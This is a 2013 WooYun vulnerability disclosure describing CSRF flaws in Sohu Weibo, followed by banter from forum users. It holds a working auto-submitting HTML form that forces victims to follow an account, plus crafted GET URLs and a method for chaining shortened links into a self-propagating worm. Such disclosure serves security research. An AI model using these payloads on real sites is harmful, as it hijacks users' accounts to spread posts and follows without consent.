当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020404

漏洞标题:搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝

相关厂商:搜狐

漏洞作者: se55i0n

提交时间:2013-03-21 11:14

修复时间:2013-03-26 11:15

公开时间:2013-03-26 11:15

漏洞类型:CSRF

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-21: 细节已通知厂商并且等待厂商处理中
2013-03-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

For a gift!

详细说明:

1)CSRF刷粉丝
搜狐对于“xxx.t.sohu.com”这样的域名均未校验referer,例子POC如下:

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://ourhome.t.sohu.com/follow/addfollows" method="POST">
<input type="text" name="friendids" value="3262276" />
<input type="text" name="uid" value="3262276" />
<input type="submit" value="submit" />
</form>
<script>
	document.se55i0n.submit();
</script>
</body>
</html>


2)CSRF蠕虫
2.1)无意间发现搜狐,有个像分析推荐某某微博的功能,点击推荐搜狐官方微博并抓包;

1.png


POST /user/recommend/tweet HTTP/1.1
Host: t.sohu.com
Proxy-Connection: keep-alive
Content-Length: 184
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://t.sohu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Content-Type: application/x-www-form-urlencoded
Referer: http://t.sohu.com/following?cur=1&gid=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ...
msg=%5B%u8272%u8FF7%u8FF7%5D%20csrf%u6D4B%u8BD5@%u641C%u72D0%u5FAE%u535A%u5B98%u65B9%20%u7684%u5FAE%u535A%u4E0D%u9519%uFF0C%u63A8%u8350%u5927%u5BB6%u53BB%u770B%u770B%uFF01&uid=31963453


2.2)试着改为GET请求,居然成功了(太不应该了),请求成功后会发送一条微博;

4.png


看测试效果;

6.png


2.3)经过后面的测试,发现“msg”的内容和uid参数也是能够完全掌控的,所以这就给了我们机会来小玩一次csrf蠕虫。将下面的GET请求伪装成一个短地址,再配上诱人的内容;

http://t.sohu.com/user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01&uid=1521422610


7.png


看效果图,:D

8.png


2.4)好吧,想让它多传播几次,我们只需要将上面的转换好了的短地址再出入到msg内容里,并将其再转换地址,这样就具备了2次传播的功能,当然可不止这么一种玩法哟;

http://t.sohu.com/user/recommend/tweet?msg=%u5251%u5fc3%u679c%u7167%uff0c%u901f%u5ea6%u56f4%u89c2%uff01http://url.cn/DTqtgI&uid=1521422610


哈哈,我们还是看效果吧(想几次传播你说了算);

9.png


2.5)一个较完整的二次传播测试效果,哈哈(发个微博诱惑大家点击,用户点击后形成第一次传播,用户的粉丝再点击形成第二次传播,当然还可以第三次、第四次....)

11.png


PS:仅仅自己测试,我木有粉丝哈哈!

漏洞证明:

见详细说明!~

修复方案:

你懂的~

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-03-26 11:15

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-21 11:31 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    For a gift!

  2. 2013-03-21 11:34 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖子 :D

  3. 2013-03-21 11:40 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 话说你真的是胖子么?

  4. 2013-03-21 11:52 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @px1624 174 140斤谁与争锋?

  5. 2013-03-21 12:06 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @小胖子 .. 176 180斤感和我比!

  6. 2013-03-21 12:21 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖子 @冷静 弱爆了都,,

  7. 2013-03-21 13:33 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    168 130斤,算胖么?

  8. 2013-03-21 13:59 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 ...174 150飘过、、、

  9. 2013-03-21 14:01 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @px1624 就你这体重,你还想飘起来~~~哼~

  10. 2013-03-21 17:55 | saber ( 路人 | Rank:8 漏洞数:2 | 我只是一个人走了太久,久到习惯了一个人。)

    gift...

  11. 2013-03-22 09:30 | As0n ( 路人 | Rank:4 漏洞数:3 | 我是技术宅,求交流,求基友)

    你们都不行,160,体重160

  12. 2013-03-22 11:26 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    围观楼上的胖子们

  13. 2013-03-25 14:05 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @搜狐 什么个情况,你们这是想修复后再忽略么?

  14. 2013-03-26 21:40 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

    @se55i0n 感谢你造福人类!让我这靠僵尸粉过日子的有了希望······